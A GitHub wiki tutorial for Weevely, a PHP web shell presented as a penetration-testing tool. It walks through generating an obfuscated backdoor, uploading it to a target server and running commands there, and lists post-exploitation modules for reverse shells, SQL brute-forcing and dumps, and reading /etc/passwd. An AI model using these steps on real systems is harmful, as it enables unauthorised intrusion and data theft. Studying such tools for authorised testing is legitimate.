Explore GitHub Search Features Blog

118 21

public epinna / Weevely

Code Network Pull Requests 0 Issues 0 Wiki Graphs Home Pages Wiki History Git Access

Tutorial
Weevely is a PHP web shell that provides a telnet-like console to execute system commands and automatize administration and post-exploitation tasks. Just generate and upload the PHP code on the target web server, and run the Weevely client locally to transmit shell commands.

Prerequisites
Linux
A basic python installation is enough to support Weevely on Linux. Some optional modules require third party software, to use: Module :file.mount install httpfs;

 Module :audit.mapwebfiles install beautifulsoup (you can fetch it from APT with sudo apt-get install python-beautifulsoup in a Debian-like environment).

Windows/MacOS
pyreadline is required in a Windows environment. First download and install the setuptools Python package manager utility from the official site, then run %PYTHONPATH %/Scripts/easy_install.exe beautifulsoup4 pyreadline (this will install the beautifulsoup optional package too). The same goes for a MacOS environment.

Server-side installation
Weevely needs a little PHP backdoor to be installed on the target web server. First of all generate the PHP code with:
# Usage: ./weevely generate <password> [output path] $ ./weevely.py generate p4ssw0rd [generate.php] Backdoor file 'weevely.php' created with password 'p4ssw0rd'.

then upload weevely.php to the target web server either by using legit user access or exploiting some web application bugs in a successful penetration test. There are a number of different generators available, see Generators list for more information.

Send commands
Weevely automatically detects the best method to execute system commands on the remote host at startup, here's a sample session:
# Usage: ./weevely <url> <password> $ ./weevely.py http://target.org/weevely.php p4ssw0rd ________ __ | | | |-----.----.-.--.----' |--.--. | | | | -__| -__| | | -__| | | | |________|_____|____|___/|____|__|___ | v1.0 |_____| Stealth tiny web shell [+] Welcome to Weevely. Browse filesystem and execute system commands. [+] Hint: Use ':help' to list available modules. www-data@target.com:/var/www/$ Linux www-data@target.com:/var/www/$ boot dev home lib64 bin cdrom etc initrd.img www-data@target.com:/var/www/$ uname ls / media opt lib mnt root proc sbin run srv selinux tmp sys var usr

When a too restrictive PHP configuration inhibits the system command execution, Weevely falls back to a pure PHP shell (the prompt become (PHP)>) that provides builtin versions of the ls and cd commands and modules execution.

Single commands can also be executed directly from the command line:
# Usage: ./weevely <url> <password> "<command>" $ ./weevely.py http://target.org/w.php p4ssw0rd "uname" Linux

Modules
Weevely's modular structure aims to simplify administration and post-exploitation tasks. Full module description is available in the Modules list page.

Show modules help

Run :help to print the module list:
www-data@target.com:/var/www/$ :help +--------------------+------------------------------------------------------+ | generator | description | +--------------------+------------------------------------------------------+ | :generate.htaccess | Generate backdoored .htaccess | | :generate.php | Generate obfuscated PHP backdoor | | :generate.img | Backdoor existing image and create related .htaccess | +--------------------+------------------------------------------------------+ +----------------------+----------------------------------------------------------------------+ | module | description | +----------------------+----------------------------------------------------------------------+ | :audit.systemfiles | Find wrong system files permissions | | :audit.userfiles | Find wrong file permissions in users home folders | | :audit.etcpasswd | Enumerate users and /etc/passwd content | | :audit.mapwebfiles | Crawl and enumerate web folders files permissions | | :audit.phpconf | Check php security configurations | | :shell.sh | Execute system shell command | | :shell.php | Execute PHP statement | | :system.info | Collect system informations | | :find.name | Find files with matching name | | :find.perms | Find files with write, read, execute permissions | | :find.suidsgid | Find files with superuser flags | | :backdoor.reversetcp | Send reverse TCP shell | | :backdoor.tcp | Open a shell on TCP port |

| :bruteforce.sqlusers | Bruteforce all SQL users | | :bruteforce.sql | Bruteforce SQL username | | :file.edit | Edit remote file | | :file.read | Read remote file | | :file.webdownload | Download binary/ascii files from target filesystem | | :file.enum | Enumerate remote paths | | :file.upload2web | Upload binary/ascii file into web folders and guess corresponding url | | :file.upload | Upload binary/ascii file into target filesystem | | :file.rm | Remove remote files and folders | | :file.check | Check remote files type, md5 and permission | | :file.mount | Mount remote filesystem using HTTPfs | | :file.download | Download binary/ascii files from target filesystem | | :sql.console | Run SQL console and single queries | | :sql.dump | Get SQL database dump | | :net.proxy | Install and run Proxy to tunnel traffic through target | | :net.scan | Print interface addresses | | :net.phpproxy | Install remote PHP proxy | | :net.ifaces | Print interfaces addresses | +----------------------+----------------------------------------------------------------------+ Hint: Run ':help <module>' to print detailed usage informations.

To get detailed information about a module, run :help <module name>.

www-data@target.com:/var/www/$ :help file.upload usage: :file.upload [-chunksize CHUNKSIZE] [-vector {file_put_contents,fwrite}] [-force] lpath rpath Upload binary/ascii file into target filesystem positional arguments: lpath rpath optional arguments: -chunksize CHUNKSIZE -vector {file_put_contents,fwrite}

-force www-data@target.com:/var/www/$

Module name completion is available by pressing the <tab> key.

Run module
Execute a module with :<module> [options] as described in the help, for example:
www-data@target.com:/var/www/$ :file.upload /local/home/foo.sh /tmp/bar.sh True www-data@target.com:/var/www/$$ ls -al /tmp/bar.sh -rw-r--r-- 1 www-data www-data 1812 Jan 9 19:31 /tmp/bar.sh

Module options can be set for the entire session by using :set <module> <option>..., every <option> is a argument=value string. Subsequent modules executions will use the specified options.

Script loading
A script is a text file containing one Weevely command per line. To execute a script at runtime, use :load <script path>. Weevely reads a default rc file (~/.weevely/weevely.rc) at startup, this is used to initialize some parameters before loading modules.

Proxy setting
To run Weevely through an HTTP proxy set the shell.php proxy parameter in the default rc file:
$ cat ~/.weevely/weevely.rc :set shell.php proxy=http://myproxy.com:8123 $ ./weevely.py http://target.org/w.php p4ssw0rd ":system.info client_ip" myproxy.com www-data@target.com:/var/www/$

SOCKS4 and SOCKS5 proxies will also work (set socks4://host:port or socks5://host:port respectively). Last edited by epinna, GitHub About us Blog Contact & support GitHub Enterprise Site status Applications

GitHub for Mac GitHub for Windows GitHub for Eclipse GitHub mobile apps Services Gauges: Web analytics Speaker Deck: Presentations Gist: Code snippets Job board Documentation GitHub Help Developer API GitHub Flavored Markdown GitHub Pages More Training Students & teachers The Shop Plans & pricing The Octodex

2013 GitHub, Inc. All rights reserved. Terms of Service Privacy Security